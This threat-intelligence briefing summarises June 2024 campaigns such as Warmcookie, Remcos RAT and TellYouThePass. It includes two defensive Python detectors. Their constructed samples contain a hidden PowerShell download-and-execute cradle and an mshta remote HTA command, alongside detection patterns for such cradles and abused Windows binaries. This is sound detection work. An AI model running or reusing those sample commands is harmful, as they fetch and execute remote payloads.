Cyware Daily Threat Intelligence

Daily Threat Briefing • Jun 12, 2024
Imagine an email landing in your inbox promising career advancement and a lucrative new role. Behind it sits Warmcookie, a new Windows malware that gets into corporate networks through fake job offer phishing lures. Once running, it fingerprints the machine in detail, captures screenshots, and deploys additional payloads.
Microsoft's June Patch Tuesday is out, fixing 49 vulnerabilities. Chief among them is a critical remote code execution flaw in Microsoft Message Queuing (MSMQ). Also in the mix is a publicly disclosed zero-day in DNSSEC validation.
The Smishing Triad, a notorious fraud group, has extended its reach to Pakistan. Its latest lure targets mobile carrier customers with messages posing as official notices from Pakistan Post. To slip past detection, the group uses local phone numbers and domain names so that its infrastructure blends in.
Don’t be fooled by Warmcookie
A new Windows malware called Warmcookie is being distributed through fake job offer phishing campaigns to infiltrate corporate networks. It performs extensive machine fingerprinting, captures screenshots, and deploys additional payloads. The phishing emails link to fake job platforms that redirect to malicious landing pages. Once executed, the malware establishes communication with a command-and-control (C2) server, collects victim information, captures screenshots, executes operator commands, and runs checks designed to detect and evade analysis environments.
Fake shipping lures drop Remcos RAT
Researchers spotted a new phishing campaign distributing the Remcos RAT via UUEncoded file attachments on emails themed around importing or exporting shipments. UUEncoding is a legacy text encoding that not every mail filter unpacks. The attachment decodes to an obfuscated VBS script which, once deobfuscated, saves and runs a PowerShell script that downloads Remcos. The RAT collects system information and keystrokes and sends them to a remote command-and-control (C2) server.
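The chain above (UUEncoded attachment, VBS inside, PowerShell download cradle) is straightforward to unpack and score at the mail gateway. The following is an added example written for this briefing, not code from the researchers or the page: it builds a constructed uuencoded attachment that imitates the pattern (a VBS stand-in that launches PowerShell; the filename, URL and indicator list are assumptions, not the real dropper), decodes the block with Python's binascii, and flags the script extension plus the PowerShell/download indicators. It also refuses blocks without an "end" line, since truncated framing is a common way to slip past naive decoders.

```python
from __future__ import annotations

import binascii
import re

# Constructed sample attachment for this example. It imitates the pattern
# described above (a VBS dropper that launches PowerShell to fetch a second
# stage); it is NOT the actual Remcos dropper and the URL is a placeholder.
SAMPLE_VBS = (
    'Set sh = CreateObject("WScript.Shell")\r\n'
    'sh.Run "powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient)'
    ".DownloadString('http://example.invalid/stage2.ps1'))\", 0, False\r\n"
)
BENIGN_TXT = "Packing list\r\nCrate 1: 40 units\r\nCrate 2: 12 units\r\n"


def uuencode(data: bytes, name: str, mode: str = "644") -> str:
    """Wrap bytes in classic uuencode framing (used only to build the samples)."""
    lines = [f"begin {mode} {name}"]
    for i in range(0, len(data), 45):               # uuencode carries 45 bytes per line
        lines.append(binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n"))
    lines += ["`", "end"]                            # zero-length line, then the 'end' marker
    return "\n".join(lines) + "\n"


SAMPLE_UU = uuencode(SAMPLE_VBS.encode(), "Shipping_Docs_Invoice.vbs")
BENIGN_UU = uuencode(BENIGN_TXT.encode(), "packing_list.txt")

UU_BEGIN = re.compile(r"^begin\s+[0-7]{3,4}\s+(.+)$")


def decode_uu_attachment(text: str) -> tuple[str, bytes]:
    """Parse one uuencoded block and return (filename, decoded bytes).

    Raises ValueError when the 'begin'/'end' framing is incomplete; a truncated
    block is itself worth flagging rather than silently accepting.
    """
    name, body, in_body = None, bytearray(), False
    for line in text.splitlines():
        if not in_body:
            m = UU_BEGIN.match(line)
            if m:
                name, in_body = m.group(1).strip(), True
            continue
        if line == "end":
            return name, bytes(body)
        if line.strip() in ("", "`"):                # empty / zero-length lines carry no data
            continue
        body += binascii.a2b_uu(line.encode("ascii"))
    raise ValueError("no 'end' line: truncated or malformed uuencoded block")


# Indicators of a script that hands off to PowerShell and pulls a remote payload
# (assumed list for the example; tune to your environment).
CONTENT_INDICATORS = [
    (rb"WScript\.Shell", "WScript.Shell (process launch from VBS)"),
    (rb"\bpowershell\b", "PowerShell invocation"),
    (rb"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", "remote download cradle"),
    (rb"-w(?:indowstyle)?\s+hidden", "hidden PowerShell window"),
    (rb"-e(?:p|xecutionpolicy)\s+bypass", "execution-policy bypass"),
]
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)$", re.I)


def assess_attachment(uu_text: str) -> dict:
    """Decode a uuencoded attachment and score it on filename and content."""
    name, payload = decode_uu_attachment(uu_text)
    findings = []
    if SCRIPT_EXT.search(name):
        findings.append(f"script attachment: {name}")
    for pattern, why in CONTENT_INDICATORS:
        if re.search(pattern, payload, re.I):
            findings.append(why)
    # A script extension plus any launch/download indicator, or several content
    # indicators on their own, is enough to pull the message for review.
    suspicious = (SCRIPT_EXT.search(name) and len(findings) >= 2) or len(findings) >= 3
    return {"filename": name, "size": len(payload), "findings": findings,
            "verdict": "suspicious" if suspicious else "benign"}


if __name__ == "__main__":
    for blob in (SAMPLE_UU, BENIGN_UU):
        print(assess_attachment(blob))
```

Run it as a script to see both samples scored; in a gateway, feed decode_uu_attachment() the raw body of any message part that starts with a "begin" line, regardless of the declared MIME type, since the lure relies on the encoding not being recognised.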
TellYouThePass abuses PHP bug
The TellYouThePass ransomware group began exploiting a critical flaw in PHP on Windows servers shortly after a proof-of-concept script was released. The attackers used the flaw to execute arbitrary code, uploading webshells and launching mshta.exe, a signed Windows binary that runs HTML Application (.hta) files, to execute the next stage. The ransomware reports details about the infected machine to a command-and-control server and then writes a ransom note into the web directory.
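A web server or PHP worker spawning mshta.exe is the kind of process lineage that gives this campaign away long before the ransom note appears. The block below is an added example for this briefing, not tooling from the page or the researchers: it runs a simple process-tree rule over constructed process-creation events (field names modelled on Sysmon Event ID 1, values invented, 203.0.113.5 is a documentation address). It generalises beyond mshta.exe to any signed Windows binary commonly abused as a stager being launched by a web server process, and separately flags mshta.exe fetching an HTA from a remote URL.

```python
from __future__ import annotations

import ntpath
import re

# Constructed process-creation events for this example. Field names mirror
# Sysmon Event ID 1 (Image, ParentImage, CommandLine); the values are invented,
# the IP (203.0.113.5) is a documentation address, and none of this comes from
# the reported TellYouThePass incidents.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\xampp\php\php-cgi.exe",
     "CommandLine": "mshta.exe http://203.0.113.5/dd3.hta"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\xampp\apache\bin\httpd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\Downloads\installer.hta"},
    {"Image": r"C:\xampp\php\php-cgi.exe",
     "ParentImage": r"C:\xampp\apache\bin\httpd.exe",
     "CommandLine": "php-cgi.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://203.0.113.5/update.hta"},
]

# Web-server and PHP worker images that should not be spawning shells or script
# hosts on a Windows host, and the signed Windows binaries ("LOLBins") that are
# routinely abused to fetch and run second stages. Both lists are assumptions
# for the example; extend them to match your own stack.
WEB_SERVER_IMAGES = {"php-cgi.exe", "php.exe", "httpd.exe", "apache.exe", "nginx.exe", "w3wp.exe"}
LOLBINS = {"mshta.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe",
           "bitsadmin.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://", re.I)


def image_name(path: str) -> str:
    """Lower-cased final path component; ntpath parses Windows paths on any OS."""
    return ntpath.basename(path).lower()


def classify(event: dict) -> tuple[str, str]:
    """Return (severity, reason) for one process-creation event."""
    child = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if parent in WEB_SERVER_IMAGES and child in LOLBINS:
        return "high", f"{parent} spawned {child}: web server launching a LOLBin"
    if child == "mshta.exe" and REMOTE_URL.search(cmdline):
        return "medium", "mshta.exe executing an HTA from a remote URL"
    return "none", ""


def hunt(events: list[dict]) -> list[dict]:
    """Run classify() over a batch and keep only the events that fire."""
    hits = []
    for ev in events:
        severity, reason = classify(ev)
        if severity != "none":
            hits.append({"severity": severity, "reason": reason,
                         "parent": ev.get("ParentImage"), "child": ev.get("Image"),
                         "cmdline": ev.get("CommandLine")})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"[{hit['severity']}] {hit['reason']} :: {hit['cmdline']}")
```

The local-HTA-from-explorer event and the ordinary httpd.exe → php-cgi.exe spawn are deliberately left silent: the rule keys on the parent being a web server, not on mshta.exe alone, which keeps it quiet on developer workstations while still catching the webshell-to-stager step.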
Chinese FortiGate campaign
The Dutch NCSC warned that a Chinese cyber-espionage campaign targeting vulnerable FortiGate network security appliances is larger than initially known. The attackers exploited a critical FortiOS/FortiProxy flaw to breach thousands of systems belonging to Western governments, international organizations, and defense contractors. On targets of interest they also deployed previously unknown malware that persists across reboots and firmware upgrades, giving them continued access to sensitive data. Organizations are urged to assume that such devices may already be compromised and to apply measures that limit the impact of a successful intrusion.
JetBrains warns of IntelliJ IDE flaw
JetBrains warned of a critical vulnerability in its IntelliJ-based IDEs that could leak GitHub access tokens to third parties. The flaw, tracked as CVE-2024-37051, affects IntelliJ-based IDEs from version 2023.1 onwards when the JetBrains GitHub plugin is enabled. JetBrains has released fixed IDE versions and removed the affected plugin versions from its marketplace. Users should update their IDEs and revoke any GitHub tokens (OAuth grants or personal access tokens) used with the vulnerable plugin, since updating alone does not invalidate a token that has already been exposed.
Smishing Triad targets Pakistan
The Smishing Triad threat group has expanded its operations to Pakistan, targeting mobile carrier customers with fraudulent messages that appear to come from Pakistan Post. The messages ask victims to pay for a package, harvesting personal and financial information in the process. The group uses local phone numbers and domain names to evade detection. Pakistan's National Cyber Emergency Response Team has issued an advisory telling citizens how to protect themselves.
Microsoft June 2024 Patch Tuesday
Microsoft's June 2024 Patch Tuesday addressed 49 vulnerabilities, including a critical remote code execution flaw in Microsoft Message Queuing (MSMQ), CVE-2024-30080, and a publicly disclosed zero-day in DNSSEC validation, CVE-2023-50868, a denial-of-service issue in which NSEC3 closest-encloser proofs exhaust resolver CPU. Also fixed was a Windows Wi-Fi driver vulnerability that an unauthenticated attacker within Wi-Fi range could exploit for remote code execution. The MSMQ bug carries a CVSS base score of 9.8; it is only reachable on hosts where the MSMQ service is installed and listening (TCP port 1801), so checking for that service is a quick way to triage exposure while patches roll out.
ICS security advisories
CISA released six ICS advisories on June 11 covering vulnerabilities in industrial control system products from Rockwell Automation (ControlLogix, GuardLogix, and CompactLogix), AVEVA (PI Web API and PI Asset Framework Client), Intrado (911 Emergency Gateway), Schneider Electric (APC Easy UPS Online Monitoring Software), and MicroDicom (DICOM Viewer). CISA encourages users and administrators to review the advisories for technical details and mitigations.
Fortinet security update
Fortinet has released security updates for a FortiOS vulnerability that could allow an attacker to take control of affected systems. The issue consists of multiple buffer overflows in the "diag npu" command-line command. Because the bug sits in a CLI command, exploitation requires an attacker who can already run commands on the device; the fix still matters, as it turns a limited account into arbitrary code execution. Users and administrators should review the Fortinet security bulletin and apply the updates.